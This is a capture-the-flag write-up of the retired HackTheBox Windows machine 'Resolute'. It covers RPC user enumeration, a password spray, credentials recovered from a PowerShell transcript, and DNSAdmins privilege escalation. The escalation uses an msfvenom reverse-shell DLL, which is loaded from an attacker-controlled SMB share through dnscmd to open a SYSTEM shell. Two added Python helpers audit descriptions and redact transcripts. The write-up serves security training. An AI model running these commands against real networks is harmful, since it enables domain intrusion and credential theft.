HackTheBox - Resolute


Resolute just retired on HackTheBox; it's a medium difficulty Windows box. Still being a bit new to the Windows environment, the enumeration process got a bit long and tedious for me at some point, but in the end I got to see real-life scenarios and gained access to root, or should I say SYSTEM. I would recommend this box if you are comfortable on easy boxes and want to level up to a medium one.

Tl;Dr: To get the user flag you first have to enumerate users over RPC; doing so, you find a default password in one user's description field. This password allows you to connect as the Melanie user through WinRM and get the user flag.
For the root flag you first have to pivot to the Ryan user using his credentials, which are hard-coded in a PowerShell transcript. Ryan being a DNS admin, we can abuse the plugin DLL loading of the DNS service, which runs as SYSTEM, to execute a privileged reverse shell and grab the root flag.

Alright! Let’s get into the details now!


First things first, let's add the box IP to the hosts file:

[hg8@archbook ~]$ echo "10.10.10.169 resolute.htb" >> /etc/hosts

and let’s start!

User Flag

Recon

Let’s start with the classic nmap scan to see which ports are open on the box:

[hg8@archbook ~]$ nmap -sV -sT -sC --top-ports 10000 resolute.htb                                                     
Nmap scan report for resolute.htb (10.10.10.169)
PORT STATE SERVICE VERSION
53/tcp open tcpwrapped
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-05-28 13:32:03Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Resolute
| NetBIOS computer name: RESOLUTE\x00
| Domain name: megabank.local
|_ Forest name: megabank.local

Nmap done: 1 IP address (1 host up) scanned in 150.18 seconds

So the box is running Windows Server 2016 Standard 14393 and has several common ports open that will probably come in handy later, like RPC, LDAP or WinRM. Yet we don't have FTP, HTTP or SSH open, so let's continue our enumeration to gather more information about this box.

Since port 135 (RPC) is open we should be able to enumerate users; let's run enum4linux to see what we can get:

[hg8@archbook ~]$ enum4linux 10.10.10.169 2>/dev/null
Starting enum4linux v0.8.9
[...]

=============================
| Users on 10.10.10.169 |
=============================
index: 0x10b0 RID: 0x19ca acb: 0x00000010 Account: abigail Name: (null) Desc: (null)
index: 0xfbc RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
index: 0x10b4 RID: 0x19ce acb: 0x00000010 Account: angela Name: (null) Desc: (null)
index: 0x10bc RID: 0x19d6 acb: 0x00000010 Account: annette Name: (null) Desc: (null)
index: 0x10bd RID: 0x19d7 acb: 0x00000010 Account: annika Name: (null) Desc: (null)
index: 0x10b9 RID: 0x19d3 acb: 0x00000010 Account: claire Name: (null) Desc: (null)
index: 0x10bf RID: 0x19d9 acb: 0x00000010 Account: claude Name: (null) Desc: (null)
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null) Desc: A user account managed by the system.
index: 0x10b5 RID: 0x19cf acb: 0x00000010 Account: felicia Name: (null) Desc: (null)
index: 0x10b3 RID: 0x19cd acb: 0x00000010 Account: fred Name: (null) Desc: (null)
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0x10b6 RID: 0x19d0 acb: 0x00000010 Account: gustavo Name: (null) Desc: (null)
index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0x10b1 RID: 0x19cb acb: 0x00000010 Account: marcus Name: (null) Desc: (null)
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak Desc: Account created. Password set to Welcome123!
index: 0x10c0 RID: 0x2775 acb: 0x00000010 Account: melanie Name: (null) Desc: (null)
index: 0x10c3 RID: 0x2778 acb: 0x00000010 Account: naoki Name: (null) Desc: (null)
index: 0x10ba RID: 0x19d4 acb: 0x00000010 Account: paulo Name: (null) Desc: (null)
index: 0x10be RID: 0x19d8 acb: 0x00000010 Account: per Name: (null) Desc: (null)
index: 0x10a3 RID: 0x451 acb: 0x00000210 Account: ryan Name: Ryan Bertrand Desc: (null)
index: 0x10b2 RID: 0x19cc acb: 0x00000010 Account: sally Name: (null) Desc: (null)
index: 0x10c2 RID: 0x2777 acb: 0x00000010 Account: simon Name: (null) Desc: (null)
index: 0x10bb RID: 0x19d5 acb: 0x00000010 Account: steve Name: (null) Desc: (null)
index: 0x10b8 RID: 0x19d2 acb: 0x00000010 Account: stevie Name: (null) Desc: (null)
index: 0x10af RID: 0x19c9 acb: 0x00000010 Account: sunita Name: (null) Desc: (null)
index: 0x10b7 RID: 0x19d1 acb: 0x00000010 Account: ulf Name: (null) Desc: (null)
index: 0x10c1 RID: 0x2776 acb: 0x00000010 Account: zach Name: (null) Desc: (null)
[...]

enum4linux complete

We notice something very interesting on the marko user:

Desc: Account created. Password set to Welcome123!

Looks like new accounts get a default password of Welcome123!.
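The description field that leaked this password is the AD description attribute, readable by every domain user (and here even through a null session). As an added audit check, not part of the original writeup, the Python below parses enum4linux user lines, flags descriptions that carry credential-like words and decodes the ACB disabled flag; the sample lines are constructed.

```python
import re

# Constructed sample of enum4linux "Users on ..." output (same shape as the real listing above).
SAMPLE_ENUM4LINUX = """\
index: 0x10b0 RID: 0x19ca acb: 0x00000010 Account: abigail Name: (null) Desc: (null)
index: 0xfbc RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak Desc: Account created. Password set to Welcome123!
index: 0x10a3 RID: 0x451 acb: 0x00000210 Account: ryan Name: Ryan Bertrand Desc: (null)
index: 0x10c0 RID: 0x2775 acb: 0x00000010 Account: melanie Name: (null) Desc: (null)
index: 0x10c9 RID: 0x27aa acb: 0x00000010 Account: svc_scan Name: (null) Desc: temp pwd is Spring2019, please change
"""

# One enum4linux user line: index/RID/acb are hex; Name is matched lazily so "Desc:" anchors the split.
USER_LINE = re.compile(
    r"^index:\s+(?P<index>0x[0-9a-fA-F]+)\s+RID:\s+(?P<rid>0x[0-9a-fA-F]+)\s+"
    r"acb:\s+(?P<acb>0x[0-9a-fA-F]+)\s+Account:\s+(?P<account>\S+)\s+"
    r"Name:\s+(?P<name>.*?)\s+Desc:\s+(?P<desc>.*)$"
)

# Words that usually mean a description field is carrying a credential.
SECRET_HINTS = re.compile(r"\b(password|passwd|pwd|pass(?:phrase)?|credential|pin)\b", re.IGNORECASE)

ACB_DISABLED = 0x0001  # SAMR account-control bit for a disabled account


def parse_users(text):
    """Turn enum4linux user lines into dicts; '(null)' becomes None and acb becomes an int."""
    users = []
    for line in text.splitlines():
        m = USER_LINE.match(line.strip())
        if not m:
            continue
        rec = m.groupdict()
        rec["acb"] = int(rec["acb"], 16)
        for key in ("name", "desc"):
            if rec[key] == "(null)":
                rec[key] = None
        users.append(rec)
    return users


def find_secret_descriptions(text):
    """Return (account, description) for every user whose description hints at a credential."""
    return [(u["account"], u["desc"]) for u in parse_users(text)
            if u["desc"] and SECRET_HINTS.search(u["desc"])]


def find_disabled(text):
    """Accounts with ACB_DISABLED set, so the audit can separate dormant accounts from live ones."""
    return [u["account"] for u in parse_users(text) if u["acb"] & ACB_DISABLED]
```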

Since the WinRM port (5985) is open, maybe we can log in as marko and list his files. Let's first try the credentials against the C$ share:

[hg8@archbook ~]$ smbclient -U 'marko' //10.10.10.169/c$
Enter MYGROUP\marko's password: Welcome123!
session setup failed: NT_STATUS_LOGON_FAILURE

No luck here. Seems like marko has either already changed his password…

Brute-force using default password

Since Welcome123! seems to be the default password for newly created accounts, maybe other users still use this password?

With the list of users we retrieved earlier, let's run crackmapexec to see if any account can log in with Welcome123!:

[hg8@archbook ~]$ crackmapexec smb 10.10.10.169 -u users.txt -p password.txt
SMB 10.10.10.169 445 RESOLUTE [*] Windows Server 2016 Standard 14393 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\Administrator:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\Guest:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\krbtgt:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\DefaultAccount:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\ryan:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\marko:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\sunita:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\abigail:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\marcus:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\sally:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\fred:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\angela:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\felicia:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\gustavo:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\ulf:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\stevie:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\claire:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\paulo:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\steve:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\annette:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\annika:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\per:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\claude:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [+] megabank.local\melanie:Welcome123!

Bingo! We have Melanie's account credentials. What now?

LDAP Dump

Since the LDAP port is open, let's dump the Active Directory information from it using ldapdomaindump:

[hg8@archbook ~]$ ldapdomaindump -u MEGABANK\\melanie 10.10.10.169
Password:
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished

We can now start a Python HTTP server to take a look at the information, nicely formatted as HTML:

[hg8@archbook ~]$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

Browsing to domain_users_by_group.html, we notice that Melanie belongs to "Remote Management Users":

resolute ldapdump

Shell as Melanie

Since melanie is part of Remote Management Users and the WinRM port is open, we can probably use it to get a shell:

[hg8@archbook ~]$ evil-winrm -i 10.10.10.169 -u melanie -p "Welcome123\!"

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\melanie\Documents> type ..\Desktop\user.txt
0xxxxxxxxxxxxxxxxxx0

Root Flag

Recon

Looking around, we notice another user account named Ryan:

*Evil-WinRM* PS C:\> dir C:\Users

Directory: C:\Users

Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/25/2019 10:43 AM Administrator
d----- 12/4/2019 2:46 AM melanie
d-r--- 11/20/2016 6:39 PM Public
d----- 9/27/2019 7:05 AM ryan

We are probably going to have to pivot to his account. Let's keep that in mind and continue our recon.

Pivot melanie -> ryan

Digging in, we find an uncommon hidden folder named PSTranscripts at the root of C:\:

*Evil-WinRM* PS C:\> ls -Hidden

Directory: C:\

Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs- 12/3/2019 6:40 AM $RECYCLE.BIN
d--hsl 9/25/2019 10:17 AM Documents and Settings
d--h-- 9/25/2019 10:48 AM ProgramData
d--h-- 12/3/2019 6:32 AM PSTranscripts
d--hs- 9/25/2019 10:17 AM Recovery
d--hs- 9/25/2019 6:25 AM System Volume Information
-arhs- 11/20/2016 5:59 PM 389408 bootmgr
-a-hs- 7/16/2016 6:10 AM 1 BOOTNXT
-a-hs- 5/28/2020 4:52 AM 402653184 pagefile.sys

Navigating into this folder, we stumble upon a PowerShell transcript text file:

*Evil-WinRM* PS C:\PSTranscripts\20191203> ls -Hidden


Directory: C:\PSTranscripts\20191203


Mode LastWriteTime Length Name
---- ------------- ------ ----
-arh-- 12/3/2019 6:45 AM 3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt

Let’s read the full transcript:

*Evil-WinRM* PS C:\PSTranscripts\20191203> type PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt

**********************
Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
Command start time: 20191203063455
**********************
PS>TerminatingError(): "System error."
>> CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Command start time: 20191203063455
**********************
PS>ParameterBinding(Out-String): name="InputObject"; value="PS megabank\ryan@RESOLUTE Documents> "
PS megabank\ryan@RESOLUTE Documents>
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!

if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="InputObject"; value="The syntax of this command is:"
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (The syntax of this command is::String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (The syntax of this command is::String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************

Looks like we have Ryan's clear-text password in there:

cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
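PowerShell transcription records every command line verbatim, so any credential passed as an argument ends up on disk, as it did here. As an added example (not from the original writeup), this Python scans transcript lines for "net use" invocations, reports the bare tokens after the share path as likely secrets, and produces a redacted copy; the transcript excerpt is constructed in the same shape as the real one.

```python
import re

# Constructed excerpt in the same shape as the transcript above (not the real file).
SAMPLE_TRANSCRIPT = """\
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\\\fs01\\backups ryan Serv3r4Admin4cc123!
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="net use Y: \\\\fs02\\share Summer2019 /user:MEGABANK\\svc_backup /persistent:no"
PS>CommandInvocation(Get-ChildItem): "Get-ChildItem"
"""

# Everything after "net use" up to the end of the line or the closing quote of the transcript value.
NET_USE = re.compile(r'\bnet\s+use\s+(?P<rest>[^\n"]*)', re.IGNORECASE)


def extract_net_use(command):
    """Split a 'net use' invocation into drive, UNC path, /user: value and bare positional tokens.

    Documented syntax is: net use DRIVE \\\\server\\share [password] [/user:NAME] ...
    The transcript above misuses it (user and password both positional), so every bare
    token after the UNC path is treated as a possible secret instead of guessing its role.
    """
    m = NET_USE.search(command)
    if not m:
        return None
    info = {"drive": None, "unc": None, "user": None, "positional": []}
    for tok in m.group("rest").split():
        low = tok.lower()
        if low.startswith("/user:"):
            info["user"] = tok[len("/user:"):]
        elif low.startswith("/"):
            continue  # other switches, e.g. /persistent:no or /delete
        elif tok.startswith("\\\\") and info["unc"] is None:
            info["unc"] = tok
        elif re.fullmatch(r"[A-Za-z]:|\*", tok) and info["drive"] is None:
            info["drive"] = tok
        else:
            info["positional"].append(tok)
    return info


def scan_transcript(text):
    """One finding per line whose 'net use' carries bare tokens after the share path."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        info = extract_net_use(line)
        if info and info["positional"]:
            findings.append({"line": n, "unc": info["unc"], "user": info["user"],
                             "secrets": info["positional"]})
    return findings


def redact(text):
    """Return the transcript with every flagged positional token replaced by <REDACTED>."""
    out = []
    for line in text.splitlines():
        info = extract_net_use(line)
        if info:
            for tok in info["positional"]:
                # Whole-token match only, so a short password does not clobber other words.
                line = re.sub(r"(?<!\S)" + re.escape(tok) + r"(?!\S)", "<REDACTED>", line)
        out.append(line)
    return "\n".join(out)
```

Transcripts and script-block logs should be treated as sensitive files with the same ACLs as the secrets they may capture; here the folder was readable by an unrelated user.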

Let’s see if the credentials are valid:

[hg8@archbook ~]$ evil-winrm -i 10.10.10.169 -u ryan -p "Serv3r4Admin4cc123\!"

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\ryan\Documents>

Bingo!

DNS Admin Privilege escalation

Ryan's password suggests he is a server admin (Serv3r4Admin4cc123!). Let's see if that's really the case:

*Evil-WinRM* PS C:\> whoami /groups

GROUP INFORMATION
-----------------

Group Name Type SID Attributes
========================================== ================ ============================================== ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
MEGABANK\Contractors Group S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins Alias S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192

Ryan belongs to the DnsAdmins group. Since the DNS service is known to run as SYSTEM, maybe we can abuse our DNS admin rights to escalate our privileges.

Searching this topic online, we find this article:

Abusing DNSAdmins privilege for escalation in Active Directory

This post details a feature abuse in AD where a user who is a member of the DNSAdmins group or has write privileges to a DNS server object can load an arbitrary DLL with SYSTEM privileges on the DNS server.

http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html

The article mentions that this attack corrupts the dns.exe service. It shouldn't be an issue for other people working on the box, since we found this note on Ryan's desktop:

*Evil-WinRM* PS C:\Users\ryan\Desktop> type note.txt
Email to team:

- due to change freeze, any system changes (apart from those to the administrator account) will be automatically reverted within 1 minute

Alright, sounds like we have all we need. Let's give it a try.

First, let's create our malicious DLL; this one will open a reverse shell:

[hg8@archbook ~]$  msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=8585 -f dll > hg8.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 460 bytes
Final size of dll file: 5120 bytes

Then we host this DLL on an SMB server we control:

[hg8@archbook ~]$ wget https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/smbserver.py
[hg8@archbook ~]$ cp hg8.dll ~/share/
[hg8@archbook ~]$ sudo python smbserver.py -smb2support hg8 /home/hg8/share/
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-9999-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-8888-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

Now we open our nc listener:

[hg8@archbook ~]$ nc -l -vv -p 8585
Listening on any address 8585

Finally we should be able to inject our DLL:

*Evil-WinRM* PS C:\> dnscmd  /config /serverlevelplugindll \\10.10.10.10\hg8\hg8.dll

Registry property serverlevelplugindll successfully reset.
Command completed successfully.

Then we restart the DNS service:

*Evil-WinRM* PS C:\> sc.exe stop dns
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 3 STOP_PENDING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x1
WAIT_HINT : 0x7530
*Evil-WinRM* PS C:\> sc.exe start dns
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 648
FLAGS :

We can see the DNS server (the RESOLUTE$ machine account) fetching our DLL from the share:

[hg8@archbook ~]$ sudo python smbserver.py -smb2support hg8 /home/hg8/share/
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.169,50246)
[*] AUTHENTICATE_MESSAGE (MEGABANK\RESOLUTE$,RESOLUTE)
[*] User RESOLUTE\RESOLUTE$ authenticated successfully
[*] RESOLUTE$::MEGABANK:4141414141414141:9bbc3576f3dfc56f64db8c2e72c24699:010100000000000000cb8cfb1235d601e6de8a857f2b6d9f0000000001001000580058006f006300480064004200710003001000580058006f006300480064004200710002001000420055004a00700041004f004400690004001000420055004a00700041004f00440069000700080000cb8cfb1235d60106000400020000000800300030000000000000000000000000400000ca3799be54bd584fc02a5a66719df22dd96fdf85822b6023559be0d172ac9b5b0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00310038000000000000000000
[*] Connecting Share(1:IPC$)
[*] Connecting Share(2:hg8)

And after a little wait, a new connection appears on our reverse shell listener:

[hg8@archbook ~]$ nc -l -vv -p 8585
Listening on any address 8585
Connection from 10.10.10.169:50247
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
exxxxxxxxxxxxxxxxxxxc

That's it folks! As always, do not hesitate to contact me for any questions or feedback!

See you next time ;)

-hg8


